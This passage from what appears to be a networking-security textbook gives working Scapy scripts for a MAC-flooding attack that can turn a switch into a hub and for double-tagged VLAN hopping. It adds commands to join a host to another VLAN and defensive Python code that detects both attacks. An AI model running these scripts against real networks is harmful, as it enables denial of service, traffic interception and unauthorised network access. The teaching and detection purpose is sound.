4.4 MAC-Flooder

Switches, like other computers, have a limited amount of memory. That is also true for the table of MAC address information the switch uses to remember which MAC is on which port, as well as for its internal ARP cache. Sometimes switches react a bit weirdly if their buffers overflow. The effects range from denial of service to giving up switching and behaving like a normal hub. In hub mode, the higher overall traffic is not the only problem: all connected computers can see the complete traffic without any additional action. You should test how your switches react to these exceptional conditions, and that's what the next script is good for. It generates random MAC addresses and sends them to your switch until the buffer is full.

    #!/usr/bin/python

    import sys
    from scapy.all import *

    # Frame with random source/destination MAC and IP addresses
    packet = (Ether(src=RandMAC("*:*:*:*:*:*"),
                    dst=RandMAC("*:*:*:*:*:*")) /
              IP(src=RandIP("*.*.*.*"),
                 dst=RandIP("*.*.*.*")) /
              ICMP())

    # Network interface from the command line, default eth0
    if len(sys.argv) < 2:
        dev = "eth0"
    else:
        dev = sys.argv[1]

    print("Flooding net with random packets on dev " + dev)

    sendp(packet, iface=dev, loop=1)

RandMAC and RandIP take care that each byte of the address is randomly generated. The rest is done by the loop parameter of the function sendp().

4.5 VLAN Hopping

VLANs are not a security feature, as already mentioned in Sect. 2.5, because the additional security of a modern, tagged VLAN depends on a header added to the packet that includes the VLAN ID. Such a packet can be easily created with Scapy. Let's say our computer is connected to VLAN 1 and wants to ping another one on VLAN 2.

    #!/usr/bin/python

    from scapy.all import *

    # Two stacked 802.1Q tags: our own VLAN first, then the target VLAN
    packet = (Ether(dst="c0:d3:de:ad:be:ef") /
              Dot1Q(vlan=1) /
              Dot1Q(vlan=2) /
              IP(dst="192.168.13.3") /
              ICMP())

    sendp(packet)

First we put the header with our own VLAN tag into the packet, and after it the one for the destination host's VLAN. The switch removes the first tag and then decides how to handle the packet; seeing the second tag with VLAN ID 2, it forwards the packet to that VLAN. On some switches this attack will only be successful if the switch is connected to other VLAN-enabled switches via stacking, because otherwise they use port-based VLAN.
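Seen from the monitoring side, both the flood from Sect. 4.4 and the double-tagged frame above leave clear traces in raw Ethernet frames. The following example is added here and is not from the book; it uses only the Python 3 standard library, and the names parse_frame, L2Monitor and build_frame, the thresholds and the sample frames are assumptions constructed for illustration.

```python
import struct
from collections import deque

TPID_8021Q = 0x8100  # EtherType value that marks an 802.1Q VLAN tag

def parse_frame(frame):
    """Return (src_mac, [VLAN ids, outermost first], inner EtherType)."""
    if len(frame) < 14:
        raise ValueError("truncated Ethernet header")
    src = ":".join("%02x" % b for b in frame[6:12])
    vlans, offset = [], 12
    (ethertype,) = struct.unpack_from("!H", frame, offset)
    while ethertype == TPID_8021Q:
        if len(frame) < offset + 6:
            raise ValueError("truncated VLAN tag")
        tci, ethertype = struct.unpack_from("!HH", frame, offset + 2)
        vlans.append(tci & 0x0FFF)   # low 12 bits of the TCI are the VLAN id
        offset += 4
    return src, vlans, ethertype

class L2Monitor:
    """Flags stacked 802.1Q tags and bursts of never-seen source MACs."""
    def __init__(self, max_new_macs=100, window=1.0):
        self.max_new_macs, self.window = max_new_macs, window
        self.known = set()      # grows without bound here; age entries out in real use
        self.recent = deque()   # timestamps at which a new source MAC first appeared

    def check(self, ts, frame):
        src, vlans, _ = parse_frame(frame)
        alerts = []
        if len(vlans) > 1:      # a host on an access port should never send two tags
            alerts.append("double-tag %s vlans=%s" % (src, vlans))
        if src not in self.known:
            self.known.add(src)
            self.recent.append(ts)
        while self.recent and ts - self.recent[0] > self.window:
            self.recent.popleft()
        if len(self.recent) > self.max_new_macs:
            alerts.append("mac-flood %d new MACs in %.1fs"
                          % (len(self.recent), self.window))
        return alerts

def build_frame(src, vlans=()):
    """Constructed sample frame: broadcast dst, given src, optional tags, IPv4."""
    tags = b"".join(struct.pack("!HH", TPID_8021Q, v) for v in vlans)
    return (b"\xff" * 6 + bytes.fromhex(src.replace(":", "")) + tags
            + b"\x08\x00" + b"\x00" * 46)
```

Feed check() the capture timestamp and raw bytes of every frame seen on a mirror port; the default of 100 new MACs per second is a placeholder to tune against the normal rate on your network.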

4.6 Let's Play Switch

Linux runs on a lot of embedded network devices; therefore it should not be surprising that one can turn one's own computer into a full-featured VLAN switch thanks to Linux. All you need is the tool vconfig. After installing the required package for your distribution, you can add your host to another VLAN with the following command.

    vconfig add eth0 1

Afterwards you must remember to start the new device and give it an IP address of the VLAN network!

    ifconfig eth0.1 192.168.13.23 up

 